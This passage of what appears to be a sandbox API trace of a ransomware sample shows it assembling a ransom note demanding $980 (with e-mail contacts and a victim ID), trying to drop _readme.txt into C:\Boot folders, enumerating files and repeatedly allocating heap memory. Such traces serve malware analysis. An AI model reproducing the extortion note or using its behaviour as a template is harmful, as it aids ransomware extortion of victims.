and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.229] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.229] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.231] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*" (normalized: "c:\\boot\\cs-cz\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.232] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.232] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.232] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.232] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.233] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 